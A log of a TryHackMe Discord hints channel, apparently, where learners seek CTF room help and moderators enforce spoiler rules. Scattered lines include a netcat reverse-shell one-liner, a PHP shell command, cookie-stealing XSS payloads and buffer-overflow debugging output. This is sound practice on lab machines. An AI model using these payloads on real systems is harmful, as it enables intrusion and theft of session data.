#room-hints
the final one is trying with php shell
another level
i'm still trying to change the directory
hey, @oblique cliff how can i change my directory, what i try doesn't work
I'd recommend doing the Learn Linux room
...
i can't remember
Please read the text in the room
It tells you what path to use.
Like, explicitly
sorry i read another time
Edit: Removed
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@stuck fractal It was less a request for a hint and more clarification of a possible bug :p
You're in the hints chat.
Aaah - Fair enough
After a little less than 2 hours i successfully finished the room. Thanks @oblique cliff // @stuck fractal.
(2 hours only for the task 5 question 2 because i don't know how to read, thx a lot !)
Woot!
2 hours better than 2 days!
If it makes you feel better I did James’s box for like 3 hours and got hard stuck
So it happens 🤷🏿♂️🤷🏿♂️
i feel better now, you're amazing thanks!
Check your VPN!
Not properly, clearly
Don't trust that
You're getting timeouts
That's a network issue
Network = VPN
Therefore you need to check your VPN
!vpnscript
how do i download the script bruh
can i get it with the terminal?
Wget, copy paste, curl, write it yourself
@oblique cliff
All of these can be done in a terminal
That should always be the first thing you do
yup
For anything you encounter in life
lmao
I’m not kidding
That's going to be an error in what you put in the script
@stuck fractal I used this that found on a writeup, just changed IP/Port
There's a random newline in there
I'll check it, thank you
i'm at task 8 on zthweb2, i know how to use wfuzz but i cant seem to find what wordlist i should use to get the right username/note.txt
could anyone nudge me towards the right wordlist?
Did you try big.txt like the previous task uses?
yeah weirdly did give me anything
I haven't done it, so I'm just spitballing. Maybe directory-2.3-medium?
🙂
im not asking for hints, but should i get user -> root for internal room
That's the normal pattern
Can someone give me just an additional hint on where the 2nd flag is in room Blue, Task 5? I seem to be only missing the 2nd 😅
it should be somewhere in Administrator @white salmon
Okeeee thanksss
need hint for relevant room
!rule 13 🙂
room: diana Initiative ctf
Access page lies but you are connected in this case
You still haven’t answered which room you’re trying to ssh into
Title: [Task 12] [Easy] [Networking] Sharing is Caring
IP: 10.10.74.170
Networking doesn't have 12 tasks
@astral smelt Are you referring to diana initiative ctf room?
The room is private
@tame kayak what are the credentials you are using?
The room requires you to use nfs so I'm a little confused on why you need SSH
Ohkay I am not sure about ssh thing I was just making attempts to connect to it
Could you help me a bit more
Why would you connect to it?
None of these tasks require SSH
And even if it does, it is pretty self explanatory
As there is a file which contains the credentials
So you're meant to use those credentials to ssh into it
You haven't even scanned the machine, no wonder you can't log in.
Please actually follow the room before coming here.
Sorry
i am trying to solve relevant and looking for a hint, i tried everything enumerating but i got the credentials and was not able to use remmina and evil-winrm, even rdp is there and i tried enum4linux, rcpdump, no luck
hello, i'm just stuck on the "Learn Linux" room Task 11. They ask me to create "noot.txt" and to run it but .. i can't : access denied ? can somebody help me ?
You need to change permissions
Search on google how to change permissions to execute file linux
Blacklist you can DM me for a very light hint if you want.
Wait
iirc you won't be able to modify the executables
and also just providing a path won't create a file
You shouldnt execute a text file
I'm on my phone right now so it's hard to get into tryhackme
But read the task again carefully, i'm pretty sure it doesn't tell you to execute noot.txt
true
they only ask me to create noot.txt
not to run it, they ask me to run shiba1. Thanks @woven mirage
/room/webappsec101 [Task 6] - Question 1 https://tryhackme.com/room/webappsec101
So we found the page where you can check your password (secured or not), and it displays us the command grep which is used to check the password
So we've tried adding some code in the field with the pipe and rm command, but every time the site crashes, have you ever heard about it ?
Any heads up on Internal ?
Not going to give hints on that one until I stream it this week as it's rated hard.
@rough helm it says to run ./shiba1 not run the noot text file. The shiba1 script looks to see if there is a noot.txt file created, if there is one, it gives you the flag
Hi the rdp and evilwinrm is not work on relevant
Ok
¯\_(ツ)_/¯
Well a lil hint maybe ?
No
If you would like a hint you may DM me for one.
❤️ Internal box
@frail void i run /home/shiba1/shiba1, and it work. I understand better how it works now, thanks to you.
Starting everything from beginning is a little hard you might as well just make a new account.
Usually rooms can be reset by asking the room owner nicely to reset your progress.
On top of that this is the wrong channel to discuss this ;)
sorry to bother, but how do I see the content of a txt file in a windows shell?
cant seem to find something with my googling skills ._.
In the future, a search such as the following would find the same. windows how to read text file
thanks
Rly... What is the full name of James Duncan Davidson..?
@patent token Nice for machine , i got it
🙂
Congrats. Can leave some thoughts in #522158404614225920 if you want. It helps us as room creators. 🙂
what have you tried
I'm keeping hints pretty close to the chest on this currently.
Are you otherwise able to execute commands?
mayor is that for me? idk which box he's working on, ill stop if its one of yours
I think it's Relevant.
gotcha, yea ill leave it to you then 🙂
And can we please delete the comments that include the directory names?
Thank you
Thanks.
Mayor are you still going to give that tiny hint by chance
If you send me a DM with where you are I'll consider it. 🙂
Awesome, I'll be right over
👀
were is my message?
I had it deleted since it contains information pertinent to the challenge which shouldn't be shared in public yet.
Ha, ok i'm sorry i did not know
Are you able to execute any other commands? Please don't share them, just a yes or no will work.
yes
I'm able to change directories to that user in the challenge. Just checked it.
Room: Vulnersity
Task: 4
Question: "Try upload a few file types to the server, what common extensions seems to be blocked?"
Answer format: .***
I tried a few files with different extensions, but every extension I tried was blocked.
What exactly does the question mean?
What common extension (for webapp pentesting) is blocked.
ah, that sounds better, thanks
You can DM me if you want.
But try to keep spoilers to a minimum. There's a bit of one in your comment.
okay deleting it..
I have this doubt... I'm currently trying tryhackme CTF challenges and was giving a try to host exploitation challenges. So figuring out ssh username and passwd is the something that's part of the task? Just wanted to know if I'm on the right task.... this is all new to me 😓
I was trying out the easy one first
That's not a public room
Okay so is there any channel where I can contact the admin for the challenges of that room?
Isn't there a discord for the event?
Ohh okay I guess I got redirected here....Thanks a lot
Hi. Any hint for Anonymous Playground room? Found some cookie and hidden site, but don't know how to get access
need help with https://tryhackme.com/room/malresearching task 5
How do i fix this ?
It's one or the other or the other
One at a time
| is generally recognised to mean OR
As is ||
Pick one at a time
Got it i thought it can take all at once
thanks
no luck still am i missing something?
You have misspelled algorithm
oops i tend to copy-paste from the room 🤷
I don't know if this is the right place to ask, I have completed Nmap and I am doing networking from blue primer series. My question is what is this blue primer and red primer? I see there are a path called primer series, is it related to that?
Also, I'm answering all the questions through googling. Is there any kind of video or lecture that is missing for free subscribers?
They are Dark's beginner rooms
If you subscribe, many rooms have videos
But you should be googling and reading documentation. That's what most of hacking is about
Yeah, I am answering every questions through google search. It's like a find and answer game and I am liking it.
So I'm not missing anything, good to hear!
If you're finding them through like, blog posts dedicated to the rooms
Then that's probably not so good
But reading documentation or stack overflow posts is good
I am avoiding blogs posts called write ups.
After completing Nmap room, I found one in the THM blog. So I'm avoiding those posts carefully. ❤️
Any hints for Relevant? Got some creds but not sure how to test these out for any running services
You may dm me for a hint.
Is it a tech glitch or am I doing something wrong ?
im trying the easypeasy room
and have connected to the ssh
and i found || .mysecretcronjob.sh ||
never mind i got root
hmm check your port and ip in php shell @shut pollen
i didnt play box , but you should check if there is some firewall rule that blocks outbound traffic , or something like that
I'll be removing that in a jiffy.
my terminal freezes when i type that. should i be in a specific CD or did i do something wrong? i mean... i don't understand, i have the password but can't use it cuz my terminal is not doing anything
i forget the command to find the password after connecting on CD https://i.imgur.com/wGWd7o4.png
cat
thanksssssssssss
The fundamentals of linux will keep coming up
hey guys, i need help with ' Gotta Catch em All' of scripting room
wait!, seems it's working 😆 , i thought that the script wasn't working because i had no response but i leave it running and now i see that's printing something, gonna check it carefully
https://i.imgur.com/SYu3f3P.png can't use find cuz it's not finding that file..
some hints? please
Which room @uneven nebula
Wait let me see, I can't remember lol
lmao
So, you need to access one of the users that can access to the /root folder
This was obvious
shiba4 maybe 🤔
I'll let you search ... 😉
:>
And the user's IDs are in a hidden file somewhere lol
Hello, i need a hint too. I can't find "shiba4" Task 33 "learning linux" room
and the file is hidden ?
Use the find command
yes
i did that:>>
I'll help you in DM to prevent spoil and spam
the answer will be the biggest mindblow ever
no no
Also
You're searching in the home directory
How do you know it is in the home directory
but i can't just search by name?
Yes you can
after 20 long minutes i succeeded
That image is a spoiler.
All good. Least you found it
Yes you're right
need help on https://tryhackme.com/room/toolsrus #10, don't know what exploit i need to use
@alpine lantern still having trouble?
yep @ashen matrix
OK to DM?
sure
Hi everyone! Can anyone drop me a hint here?
I'm stuck after finding shiba4 and running it
when I run shiba4
That's the password
Delete the password please
deleted
Thank you.
thanks
anyone has any ideas how to exploit jenkins and stuff ?
Well, what have you done already?
have you done any sort of enumeration or research?
Well unless you have the creds, then maybe SSH isn't the right way
Umm........Credentials to what ?
what room
Internal
Room: Learn linux, Task 43: Find what's in /root/root.txt. Can anyone give me a hint, it says all information is in the room but I can't find it :/
What are your privileges ?
Any hints on internal @heady anchor ?
its a new room
Can I DM you about this ?
@dim trail you have access to a few shiba users, check if there are any interesting files they have access to
alright
Any hints on internal @heady anchor ?
@shut pollen i am not sure if you can ask questions based on a new room
@white salmon any more hints you could give me?
Have you checked which uses own which files as he stated?
@ruby wraith specifically shiba2 if i recall
@trim haven i did, but i can't seem to find any interesting files that could help me
hey need hint on relevant
Mayor is the only one giving out hints
And as it is his room I think everyone should respect that.
So, I can ask him for hints
He's not online right now, I'll let him know to avoid pinging him.
Ok thanks @trim haven
anyone working on Spring? Need to bounce off couple of ideas...
@midnight lotus you can pm me
Hello, i'm blocked on the last task "bonus challenge" in the learn linux room, can somebody help me?
this one.
Look at files that are out of place that are owned by each user
I'm going to try
We need a command for that flag
hello guys can i ask a quick question on the https://tryhackme.com/room/relevant
i think something is wrong with the rdp kind of buggy
anyone having the same issue??
anyone give me a hint about internal rooms, stuck in ||jenkins||
hello guys can i ask a quick question on the https://tryhackme.com/room/relevant
@sinful plaza anyone with same issue??
sure
@patent token i tried harder sir, nice machine 👍
hey @patent token can i dm for hint ?
Really quick yea. About to have breakfast.
It's a VERY generic hint more than anything.
hello guys I'm beginning in pentesting and I'm trying to achieve the agent sudo room. I'm just struggling to find the appropriate exploit to use for the privileges escalation; can anyone help me with a hint or anything please ?
why do we need # at the end of command injection in iot room?
Hi All, any hints on SET machine.... i have found two important files one with list of usernames and other hints towards usage of weak password.......however i have tried multiple password files against the user lists but no success......am i in the right direction or brute-forcing my way in is a wrong approach?
hi all!
can someone pls give me a hint for the root user on Wonderland room?
i have checked what commands i can run as other users with sudo -l. have no clue how to continue from here.
What user are you now? @marsh ravine
I'd recommend running some enumeration scripts to be honest
still alice, but i got the user.txt flag
You can't get straight to root. You can run a single command as a different user with sudo and that's it. You're going to have to exploit that.
nothing special came on linpeas, thought i should continue with the "run python as rabbit" idea.
It's a single very specific command
And you'll probably have to do some research into python privilege escalation
thanks!
hey guys ,can i get help in room Cross-site Scripting , task 5 [DOM-Based XSS] , i did what the question ask 1 for get popup for my cookie and change the web for red but i didn't find the answer that fits the question
If you use the correct payload then you will be given a flag
In the networking room, does anyone have a hint for this question:
Thanks!
here what i get with no flag ,https://imgur.com/R43xiiV.png
Got it, thank you @stuck fractal 
@woeful sky dismiss that
i did
Then either you see a flag, or you didn't use the payload that it wants
i checked in a writeup and used their payload and still same result, you think maybe restarting the machine will help?
"keyword.innerHTML = <script>test" onmouseover="alert(document.cookie)"</script>" i use this payload any idea where wrong?
Don't use onmouseover
It's in a script
Therefore you don't need to declare it as an attribute
i didn't solve it yet , "<script>xxx" onerror ="alert(document.cookie)"</script> .
thanks
Hi all, anyone can solve jwt challenge?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
In the blue room how can you find flags?
The locations are hinted to in the hints
I found the first flag and then made a search for all file starting by flag
Need some help for RELEVANT. I think I am on the right direction but need some advice please 🙏🏻
You may DM for a hint.
Hi everyone, I could use some help in room ZTH: Obscure Web Vulns. In detail I am stuck at task 14. The JWT challenge. Someone here who could help me out...
Follow the steps exactly and it will work
is the solution a complete JWT with the same payload and a new signature? Isn't this doable in jwt.io?
I don’t remember. The steps from the previous task tell you exactly how to do it
Room Gotta Catch'em All! > Last flag > root user's favourite pokemon
Do I need to do privilege escalation to get access to the file?
Normally if you want root's files
Hello, can somebody help me i can finish the "Learning Linux" room, last Task the bonus challenge.
Are you looking for a hint or help
anybody did overflow 7? wanted to ask a question the final step
the room Learn Linux (zthlinux) has no form to place the answers or the final challenge
That's a bug, #site-support
yes, just checked i placed it in the wrong room.
On nmap question 12 I've been stuck for half an hour reading man nmap, can anyone help?
I already put -sU and a lot of other variants
That's a bug, #site-support
@stuck fractal oh wow I finished it yesterday I thought that was how it was supposed to be! haha hope I can replay it when it gets fixed
@lost delta
thanks so much!!
pls hint anonymous playground thingy
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Currently on "Linux Challenges" room and am on this question
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.
This is the command I'm running:
||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null ||
But there is no output and it is just hanging.... or its just taking forever, is this unexpected?
You're searching through every single file on the file system
Am I supposed to be?
So patience is required and expected, not a sign that I'm doing it wrong, correct?
It will take a long time. I'm not 100% on your regex but it looks like a good start. The + confuses me there though
The + is part of the find command, not the regex. + is new to group filenames rather than running one at a time.
Welp, good luck
-exec command {} +
This variant of the -exec action runs the specified command on
the selected files, but the command line is built by appending
each selected file name at the end; the total number of
invocations of the command will be much less than the number of
matched files.
Thanks!
Is it supposed to take 2 hours to grep through all the files? Do I need more patience?
Ok that seems a little steep
That's what I was thinking..... I don't want to stop the command. And I thought I tested the command thoroughly in alice's home dir with a different string
||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null || is my command
The question was changed as well, it was even more impossible before
is it okay to ask for hint on relevant yet ? did some intial enumeration but cant find as solid/functioning way to utilize my findings
!rule 13
Hi, I am currently trying to access a jenkins instance that is being run through docker. I am having trouble accessing the jenkins console/panel. I've been desperately google searching ways to access an internalized jenkins through my browser but no luck. No tools on the machine either to interact w/ jenkins
I believe I have to setup a proxy possibly?
I am trying to solve
Git Happens room.
I just need a little hint
If anyone can, I am very pleased
@pure plaza no help or hints for new room that's the rule
@maiden stream I’ll be honest I have no clue what you’ve been looking at but I didn’t do that on Jenkins
DatBoiRalph you can DM me for a hint.
Anyone a hint for RELEVANT? I found some ports & creds but now I'm stuck
You may DM me for a hint.
@patent token may i also dm?
You may.
Thank you
May I also slide?
Huh?
@patent token i think he/she means could he/she dm too?
@patent token Thank you! Really appreciate the help
You're welcome. Enjoy!
hi in the bufferoverflowprep room task 2 I forged the payload for figuring out the offset that overwrites eip but even if the app somewhat freezes only EBP and EBX got overwritten with a cyclic pattern
0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f7b4 : Contains normal cyclic pattern at ESP-0x278 (-632) : offset 2, length 632 (-> 0x0198fa2b : ESP+0x)
0BADF00D 0x0198fa30 : Contains normal cyclic pattern at ESP+0x4 (+4) : offset 638, length 462 (-> 0x0198fbfd : ESP+0x1d2)
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for pointers to cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f6e4 : Pointer into normal cyclic pattern at ESP-0x348 (-840) : 0x0198f7d0 : offset 30, length 604
0BADF00D 0x0198f6f4 : Pointer into normal cyclic pattern at ESP-0x338 (-824) : 0x0198f7d0 : offset 30, length 604
Could you provide a screenshot
Hi I am working on the Anonymous V6 room. I think I have enumerated the machine to the max. || I am looking into abusing the shared folder but I can not work out how as it is a read-only folder || Can someone supply a hint if that is correct, and if so what I should be Google Searching for more info?
which part should i screenshot ?
This doesn’t work well on mobile
ah alright
i am using the python script that recommended in the room
calculated the payload and generated a pattern of 1100bytes
the weird thing is that it finds the offset
0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)
634
however it doesn't find it in eip :E
Instead of that method why don’t you try doing the pattern offset module in metasploit?
I’ve never used the tool you’re using so I wouldn’t be sure how to debug it
that's generate me the offset
i mean that's the output of the msf-pattern-create
-l 1100
or the 2 thing are not identical ?
alright that's really weird 😄
i have changed the pattern
msf-pattern_create -l 1100 -s ABC,def,123
and now it breaks in the "right" way
and i can see the eip corrupted
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D [+] Examining registers
0BADF00D EIP contains normal pattern : 0x65433265 (offset 1687)
however
that's not the number that the room wants as a solution..
now u tell me whats going on ? 😄
The create is the same. The pattern find just finds the match
Idk what you’re doing right there to find the pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100
the run the exploit.py
and in the immunity debugger : !mona findmsp -distance 1100
0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0086394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00864d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)
it doesn't show EIP
corrupted here see ?
You can stop copying and pasting that
I can see it
/usr/share/metasploit-framework/tools/exploit/pattern_match.rb -l 1100 -q “pattern”
Do that one instead of using Mona to find the offset
i should run that against some sort of memory dump i suppose
w/e just let it go.
i'm gonna try to land the eip in the old way
What I’m describing is the old way...?
just trying to overwrite EIP instead of the fancy diff scripts and do the interval halving to find the right offset. no idea why it is breaking from +400bytes of AAAAs and not breaking from pattern_create.rb. makes 0 sense.
unless something is terribly wrong
apparently it is the lack of my understanding, but shouldn't the mona script detect that EIP is overwritten with a cyclic pattern ?
i mean that's my problem that it prints a few points that got overwritten
0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)
cause in the OVERFLOW1 challenge I could overwrite EIP with AAAAAA 4141414141 and I could find it
It's just taking the register values upon crash and reporting them. I honestly didn't use the mona script for this as it's just a ton of unnecessary work.
alright, my method here is somewhat the same as what you are saying: find a byte array that overwrites the EIP register with a known value, however this is what I am failing to achieve in the OVERFLOW2 task :/
anyway it is clear that i need to learn more and ask less. thx for the inputs tho and sorry about the frustration
So in that image your EIP is overwritten by your junk bytes (a's). If you do the same thing, but this time replace the A's with the character string you receive from pattern_create, your EIP will reflect the exact crash point in those characters.
Alternatively, the register there should show the same thing using the python script as well. When all else fails, use what you know.
yupp but in challenge 2 i cannot manage to do that
I'm not sure why to be honest.
Anyone On Git Happens?
!rule 13
@mystic walrus ^
I’m Asking About The Room Git Happens
alrite all : I am very sorry, seems like I have tried with too big payload :E
did some stackframe violation or dunno
12,400 is probably way too much.
agreed.
if i stick to the 400 recommended overflow
I just ran this quick as I have a local copy, and it gives me the EIP value there.
1100 works fine with OVERFLOW2
You're not a dumb dummy. Don't be down on yourself. This stuff can be difficult at first.
anyway thank you for the help. are u using windbg there ?
The image is the crash details from running the oscp.exe file with wine.
Actually does a good job of feeding back the crash registers.
If you know how to use it. I would stick to Immunity Debugger for now.
Hi everyone, i'm stuck in the hatter user on wonderland room. I guess i need to switch to the tryhackme user, but i have no clue how to keep going. The only thing i had in mind is that the webserver is running by the tryhackme user. Can someone pls give me a hint? Maybe some reading materials?
@marsh ravine may I ask for an image pls 🙃
@heady anchor sorted dw
@white salmon if you overflow it too much it may cause an error which changes the return address to the location of the error. So you should go too far over
Proceed with your helping my bad 😂😂
Sure
I speak too much about it sorry😅
No worries the help is appreciated 🙂
@heady anchor
Sure, but of what?
The prosses running?
@marsh ravine You currently have access to the hatter account? What have you checked within hatter?
@marsh ravine u getting hatter user now?
@ashen matrix
I have ran linpeas, nothing special popped out. Checked if i'm in the sudoers list, i'm not. And the only thing i found is the file running as the http server+tryhackme user is the one running it.
@heady anchor
I'm already hatter
@marsh ravine You need to check more
You are missing something specific
@marsh ravine try suid3num.py
need hint for internal, im stuck ..
Lemme give u some hint cmdick
U will need related capabilities for Perl
That's the biggest hint
@patent token Someone wants a hint on your room :)) (sorry for pinging I don't want it to get lost in chat)
Ok, thanks!
👍
You can DM me FrostRekt for a hint.
Made it, thank you!
Learned something new😁
any clue pls
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@patent token can i DM internal room ?
You may.
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
what's wrong, I've explained my problem to the fullest @trim haven and I'm sticking to this channel only
@wooden estuary Hey! You should read the #rules section of this Discord. Sorry if we're coming across harsh, it's just we get so many people everyday it's hard for us 😦 We can't provide help for that room until a certain number of days is up, as its so new. We are a learning platform first, but we have to respect the competitive nature of it too 🙂
I get u now @craggy pulsar , I've deleted that
@wooden estuary Thanks a lot ❤️ 🙂
We can't provide help for that room until a certain number of days is up, as its so new.
I've just read the whole channel again and didn't see any mention of this though. 😕
Is there a set, specific number of days for a room after which you can provide/get help? How many?
Depends on the room creator but a minimum of 48 hours
oh right
I didn't see the whole context, I imagined it would be in the range of 20, 40, 80 days
2 days seems kinda obvious imo
Aha
Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way
Hello, can somebody help in the "Linux Challenges" room task 2 question #4 can't find the "cron jobs".
@rough helm explain?
Have you googled where to find cron jobs
Yes, but Google tells me to go into /etc/cron.d, cron.daily ...
crontab needs root access or being in the crontab group
I know where to look now, thanks for the hints!
In the HackPark room, I answered windowscheduler.exe to the question below (Further enumerate the machine. What is the name of the abnormal service running?)
but still wrong
wscheduler.exe
That's not the name of the service, that's the name of the executable
what does ||setgid bit set|| mean pls?
Was just about to send that aha
Um, I see thank you.
anybody available for a question on ConvertMyVideo?
just ask your question here
Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way
@empty heath @solemn smelt
@empty heath no need to dm 
have you looked at a writeup to see how they got to the attack?
yes, i get it
what I don't get is how you get from the info we have, to the decision to do the attack
so i needed someone who had done it, as the writeups don't have that (unfortunately)
@trim haven The minimum wait time is 3 days, not 2 I believe 👀
need hints for git happ
need hint for "Ra2"
i've got ||certs|| ||converted pfx into pem files|| not sure what to do next 😄
Hey people, Are there any rooms related to Drupal?
If you go to hacktivities, and search drupal?
There are none. Is anyone planning to create one?
Hi. I need help with the harder room. I got a shell but can't do anything with it because of "sh: w: not found". Can't run any command
Just curious, for mrrobot, are we supposed to try to get into the user on the machine? I feel like I followed a red-herring
@vast prairie Yes.
@rose root use a different shell? bash instead of sh? how did you get the shell?
@still lintel just uploaded php file with shell
dm me the php script
'uname -a; w; id; /bin/sh -i';
remove the w;
ok, try with that
Thanks, I'll keep trying to gain access then. I think I'm close and just missing a step
@still lintel still the same
or even worse, because right now it automatically exits from the shell
Just take w; like @stuck fractal said
its without w;
How you passing the shell?
just set up the value
How are you triggering the shell?
Ahh ok
maybe I'll try with curl
If you mean this one:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.1.224 8888 >/tmp/f
doesn't work either
the one you had before was immediately exiting cuz you were trying to spawn a bash shell on a system that doesn't have bash
At the first time I tried with sh
and what was the error
sh: w: not found
remove w;
I removed
I'm stuck on mr robot.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
I'm doing 25daysofchristmas, day 10 (task 15)
I got inside the webserver using metasploit and got the creds to do the rest of the task, but didn't find the flag1
there is a directory ||/flag-dir|| but it's empty
I'm in the machine as ||daemon|| and I have the username and password for ||robot|| I'm just a bit confused as how to login as ||robot||
Not sure if that needs spoilers or not
Tried su, but it says that it needs to be in a terminal
ooo thank you!!
not a problem
You were right, once I looked that up, the rest of the challenge was easier to do.
guess I found my flag
Anybody has a hint for internal?
Sure. You can DM me.
Hello, I am stuck on the set cookie problem in the web room. I submit this and it looks like it should work but I'm getting the error that my cookie isn't named correctly
👍
anyone is up ?
Please just ask your question 🙂
need help for this room https://tryhackme.com/room/introtonetworking task 4 #6
Have you checked the hint on the question?
ye
It's in the task text if you re-read that
It's asking about TCP so jump to that part
got it thx 🙂 i'm just blind ^^
🙄
Room internal hints on how to ||break out of the Docker container||
Warmup only mayor gives out hints on internal.
@patent token sorry for the ping someone needs hint for ur new room 🙃
@white salmon please avoid from giving hints on newly released rooms :)
@trim haven im sorry..if its to much spoiler remove the comment
No problem :)
hey guys, anyone know how to use wfuzz with 3 payloads such that the first 2 are a product and the last payload just iterates?
is it a room? @flint pebble
its not
this is for thm room hint
Read the channel description
ye my bad sorry lads
np 🙃
Thanks to @patent token for Relevant room. It was a good way to exploit vulns differently and manually 🙏🏻🙏🏻🙏🏻
You're welcome! Glad you enjoyed it.
Any hint for the Wonderland room? About the privilege escalation challenge. Many thanks 😩
@mossy ermine check pins
@final mortar Ok, I'm trying to understand ahaha
Hello there, I am having some trouble in the room ZTH: Obscure Web Vulns in task 14. Can't really find the public key. I would appreciate any tip
hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..
Are we allowed hints on Spring Room yet?
sorry @oblique cliff
It's not there.
flag2 for the Blue room task 5
I've reset multiple times. Is that the key, just keep resetting until it shows?
Yes
ok
jobs
the walkthru says to getsystem for the hash capture. Do we need to do that for the flag2?
No
Yes
need help room Kenobi! Task4 #4 after doing the nc 10.10.131.16 21 to the server and copying ssh/id_rsa, next step is to mount the var directory. if i try to mount it: mount 10.10.131.16:/var NFS
nothing shows, it just hangs like that
any idea why ?
try it as root
i found that it made a NFS folder and inside is tmp/id_rsa but if I try cp tmp/id_rsa . it gives cp: cannot create regular file './id_rsa': Read-only file system
is that because of my machine or is there some trick ?
I'm on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesn't seem possible. Am I heading in the wrong direction?
@broken osprey wait I was thinking about another one
this 👇
I'm on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesn't seem possible. Am I heading in the wrong direction?
@broken osprey look for out of place files owned by different users
the only file that isn't like the others is the .sudo_as_admin file but I can't do anything with it
im just gonna have to take a break been at it too long
Hi, I'm currently doing Nmap right now, first answer was -h in the nmap but whenever I'm using -h in the nmap program it says command not found. do i need to use it some other way?
Can you show a screenshot please
I'm going to give you guys a lot to do sadly,
You didn't run nmap with it
oh right
Nmap -h
Are we allowed hints on Spring Room yet?
@ebon ferry yes, feel free to ask
hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..
@oblique shuttle you should find 3 ports, higher 2 takes some time to initialize
anyone done Ra2 room?
anyone can give me a sanity check on Relevant root?
@lusty wigeon please can I PM
sure
@still lintel think it's eluding many of us im afraid
lol mind if I DM you?
not sure I can help much but
come at me bro ?
😄
@hot skiff or @severe wave are we still hintless for Ra2_v2? cos I'm losing what little hair I have left, and I think @still lintel is going even crazier 😮 #plzandthnks
😄
Popo145 what is your question?
Spoiler tagsssssss 😦
@orchid fossil https://github.com/dievus
Hey ppl, any hints on the last question for ZTH: Web 2 ? Got stuck on some process
I have a compiled version of it in one of my repos.
||I uploaded PrinterSpoofer.exe via smb share but executing it gives me nothing at all. I tried executing it via impacket smbserver but to no avail as well. I compiled PrinterSpoofer.exe using VS 2019 and transferred it over to my parrotOS vm.||
alright ill check it out thanks!
am i doing this spoiler tag thing correctly? sorry im new here
@patent token It worked. Thanks for the help and the box.
You're welcome. I hope you were able to learn from it. 🙂
I don't know where to go further with the room "uopeasy". I did some enumerating, got some ports, accessed those web pages, did directory scans of all of them, and now I'm kinda stuck on going further
